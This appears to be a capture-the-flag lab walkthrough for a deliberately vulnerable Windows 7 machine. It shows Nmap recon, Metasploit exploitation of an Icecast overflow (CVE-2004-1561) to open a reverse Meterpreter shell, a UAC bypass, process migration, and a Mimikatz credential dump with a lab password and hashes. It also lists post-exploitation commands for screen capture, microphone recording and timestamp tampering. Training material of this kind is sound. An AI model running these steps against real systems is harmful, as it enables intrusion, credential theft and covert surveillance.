Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
Recon - Nmap Scans
nmap -sS -p- 10.10.136.87 -vvvnmap -sC -sV -O -T4 10.10.136.87 -p3389,135,139,445,5357,8000 -vvv
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server? syn-ack ttl 125
| ssl-cert: Subject: commonName=Dark-PC
| Issuer: commonName=Dark-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-07-07T22:27:33
| Not valid after: 2023-01-06T22:27:33
| MD5: 60a9 165d c701 4865 68b7 ce72 c281 6ba1
| SHA-1: 6678 a740 12ae 696e ac32 d902 dfb5 3c02 9083 ee67
| -----BEGIN CERTIFICATE-----
| MIIC0jCCAbqgAwIBAgIQKuf/zjVFJINHeum2UgKcDDANBgkqhkiG9w0BAQUFADAS
| MRAwDgYDVQQDEwdEYXJrLVBDMB4XDTIyMDcwNzIyMjczM1oXDTIzMDEwNjIyMjcz
| M1owEjEQMA4GA1UEAxMHRGFyay1QQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
| AQoCggEBAJ+cs9m+SfC482JZ+KH2kf0ttcLLKCsMZohHlAWNBFgirIw75p2l4PVl
| iO7T0+58hwXnS24OJEZ1G9GBsrGRr/SPEJfZIr8b8/WmD/LE7rlaJc3Rr+VF6x2d
| 4F6wOuKP/KSyDsEpW2K3zIPHdXC9HoWTG5uYNdXWMNqiJ08svE+7Z3wDCZEqTB68
| JG7/a3M0ymWZ+AkjcJJ7o4YG0QuMfxIBZglJC3zJ5qD2bUhcVNUua8UuzAZkJyy7
| qzdolsY1/0PU7LrDqyBk/H6xY2c/LXOQQgyQ6OSMcmE/i7nN9899hAgfWtWrsoqQ
| GsFV3rxkhejGy8LzAYXt55Rkgsab/UcCAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYB
| BQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBBQUAA4IBAQBConZzsKvz9m8d
| ohj23IztDvhcHTzn2LxtTZadQIzd7qiAI+WDAR0TK8BIhuynK1uQOITxWspAmIIT
| rgtQbn3KzyYJkMGTcUleKAwTSMf7ZuczpKpQIrdMepxmHuGTtc24388g7Or5Zybo
| qUdJ5UwvraoydqjXd3KGqJ534tVcz7Y1aSB+yIsV2AuhyisNLuhmBw5blV38ELZp
| ERGGP9/TSoWyp95kCgiwoOFwWi+e4EzdfhdNibN6HPGDABb3ae51mUN0+0lFZjhY
| 88Rzvfc+quhvV2AGqWUnQ42wb3627nyYioSRVLo9YP5BQEDtUzlOKAb1uZHcAMI5
| GqwlEBMH
|_-----END CERTIFICATE-----
|_ssl-date: 2022-07-08T22:41:37+00:00; -1s from scanner time.
5357/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http syn-ack ttl 125 Icecast streaming media server
| http-methods:
|_ Supported Methods: GET
|_http-title: Site doesn't have a title (text/html).
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.011 days (since Fri Jul 8 15:25:11 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h14m59s, deviation: 2h30m00s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59430/tcp): CLEAN (Couldn't connect)
| Check 2 (port 19722/tcp): CLEAN (Couldn't connect)
| Check 3 (port 35734/udp): CLEAN (Timeout)
| Check 4 (port 14831/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:18:f7:78:2e:61 (unknown)
| Names:
| DARK-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| DARK-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 02 18 f7 78 2e 61 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-time:
| date: 2022-07-08T22:41:32
|_ start_date: 2022-07-08T22:27:32
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-07-08T17:41:32-05:00
Questions
Which port is MSRDP
- 3389
What service did nmap identify as running on port 8000? (First word of this service)
- Icecast
What does Nmap identify as the hostname of the machine? (All caps for the answer)
- DARK-PC
Gain Access
Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.
- Execute Code Overflow
What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
- CVE-2004-1561
After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.
exploit/windows/http/icecast_header
First let’s check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let’s set that last option to our target IP. Now that we have everything ready to go, let’s run our exploit using the command exploit
1
2
3
4
5
6
7
msf6 exploit(windows/http/icecast_header) > exploit
[*] Started reverse TCP handler on 10.2.127.225:4444
[*] Sending stage (175686 bytes) to 10.10.223.231
[*] Meterpreter session 1 opened (10.2.127.225:4444 -> 10.10.223.231:49169) at 2022-07-08 17:49:09 -0700
meterpreter >
Escalate
Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now? What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.
What build of Windows is the system?
1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?
- x64
Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete
1
exploit/windows/local/bypassuac_eventvwr
Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit? Now that we have an exploit in mind for elevating our privileges, let’s background our current session using the command background or CTRL + z. Take note of what session number we have, this will likely be 1 in this case. We can list all of our active sessions using the command sessions when outside of the meterpreter shell. Go ahead and select our previously found local exploit for use using the command use FULL_PATH_FOR_EXPLOIT
Local exploits require a session to be selected (something we can verify with the command show options), set this now using the command set session SESSION_NUMBER
Now that we’ve set our session number, further options will be revealed in the options menu. We’ll have to set one more as our listener IP isn’t correct. What is the name of this option?
Set this option now. You might have to check your IP on the TryHackMe network using the command ip addr
After we’ve set this last option, we can now run our privilege escalation exploit. Run this now using the command run. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails.
1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.2.127.225:5555
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.223.231
[*] Meterpreter session 2 opened (10.2.127.225:5555 -> 10.10.223.231:49213) at 2022-07-08 18:09:51 -0700
[*] Cleaning up registry keys ...
Following completion of the privilege escalation a new session will be opened. Interact with it now using the command sessions SESSION_NUMBER
We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Loot
Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let’s list the processes using the command ps. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn’t).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
508 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
820 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
888 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
936 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1064 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1196 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1304 100 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1324 1296 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1404 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1444 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1548 820 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1568 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1588 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
1648 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1684 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1736 2276 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
1848 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2056 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2276 1324 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2452 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2512 692 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2596 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2604 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2764 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2856 820 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2876 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2892 1292 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2900 2856 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
2960 2512 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it’ll restart if we crash it! What’s the name of the printer service?
spoolsv.exe
Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell. Migrate to this process now with the command migrate -N PROCESS_NAME
1
2
3
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2892 to 1376...
[*] Migration completed successfully.
Let’s check what user we are now with the command getuid. What user is listed?
1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now that we’ve made our way to full administrator permissions we’ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command load kiwi (Kiwi is the updated version of Mimikatz)
1
2
3
4
5
6
7
8
9
10
meterpreter > load kiwi
Loading extension kiwi...
.## ## #. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ## . "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ## ' Vincent LE TOUX ( vincent.letoux@gmail.com )
'## ## #' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
Loading kiwi into our meterpreter session will expand our help menu, take a look at the newly added section of the help menu now via the command help.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Which command allows up to retrieve all credentials?
- creds_all
Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
Post-Exploitation
Before we start our post-exploitation, let’s revisit the help menu one last time in the meterpreter shell. We’ll answer the following questions using that menu.
What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)
hashdump
While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?
screenshare
How about if we wanted to record from a microphone attached to the system?
record_mic
To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.
timestomp
Mimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
golden_ticket_create
Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.
One last thing to note. As we have the password for the user ‘Dark’ we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we’d likely kick whatever user is signed onto it off if we connect to it, however, it’s always interesting to remote into machines and view them as their users do. If this hasn’t already been enabled, we can enable it via the following Metasploit module: run post/windows/manage/enable_rdp